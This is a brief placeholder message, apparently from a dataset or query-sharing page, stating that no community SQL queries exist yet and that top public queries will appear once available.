No community queries yet
The top public SQL queries from the community will appear here once available.